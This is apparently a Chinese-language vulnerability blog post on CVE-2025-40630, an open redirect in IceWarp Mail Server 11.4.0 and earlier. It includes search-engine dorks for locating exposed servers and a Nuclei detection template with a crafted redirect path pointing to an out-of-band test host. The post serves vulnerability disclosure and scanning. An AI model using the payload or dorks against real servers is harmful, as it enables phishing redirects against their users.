IceWarp Mail Server Open redirect Vulnerability

漏洞信息

漏洞名称： IceWarp Mail Server Open redirect Vulnerability

漏洞编号：

CVE： CVE-2025-40630

漏洞类型： 其他

漏洞等级： 中危

漏洞描述： IceWarp Mail Server是一款广泛使用的邮件服务器软件，适用于企业和个人用户，提供电子邮件、日历、联系人管理等服务。其典型部署场景包括企业级邮件服务，因其功能全面和易于管理而受到许多组织的青睐。该软件在全球范围内有广泛的应用基础。

该漏洞属于开放重定向（Open Redirect）类型，影响版本为11.4.0及以下。漏洞的技术根源在于服务器未能正确验证和处理用户提供的URL参数，导致攻击者可以构造恶意URL，诱骗用户访问任意域名。例如，攻击者可以通过发送包含特定构造的URL（如“https-//icewarp.domain.com///%2e%2e”）来利用此漏洞。

此漏洞的安全风险主要体现在攻击者可以利用它进行钓鱼攻击，诱骗用户访问恶意网站，进而可能导致敏感信息泄露或其他安全威胁。虽然漏洞的严重性被评定为中等，但它不需要用户认证即可被利用，且可以通过简单的网络请求自动触发，因此在某些场景下可能被大规模利用。用户应及时更新到修复版本以避免潜在的安全风险。

产品厂商： icewarp

产品名称： IceWarp Mail Server

影响版本： ≤11.4.0

搜索语法： http.title:”icewarp”, title=”icewarp”, intitle:”icewarp”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/249a01903e32b2f9745ee2295d74c927ef2b2e75/http%2Fcves%2F2025%2FCVE-2025-40630.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情


id: CVE-2025-40630

info:
  name: IceWarp Mail Server ≤11.4.0 - Open redirect
  author: DhiyaneshDK
  severity: medium
  description: |
    Open redirection vulnerability in IceWarp Mail Server affecting version 11.4.0. This vulnerability allows an attacker to redirect a user to any domain by sending a malicious URL to the victim, for example “ https-//icewarp.domain.com//<MALICIOUS_DOMAIN>/%2e%2e” https-//icewarp.domain.com///%2e%2e” . This vulnerability has been tested in Firefox.
  reference:
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40630
  classification:
    epss-score: 0.00059
    epss-percentile: 0.18581
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: deep_castle_g2
    shodan-query: http.title:"icewarp"
    fofa-query: title="icewarp"
    google-query: intitle:"icewarp"
  tags: cve,cve2025,icewarp,redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2f%5c%2foast.pro%2f.."

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'

      - type: status
        status:
          - 302

Github Poc

#projectdiscovery/nuclei-templates:github issues #其他

IceWarp Mail Server Open redirect Vulnerability

http://example.com/2025/07/23/github_3931595783/

作者

lianccc

发布于

2025年7月23日

许可协议

Parse Server GraphQL Schema Information Disclosure Vulnerability 上一篇

ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability 下一篇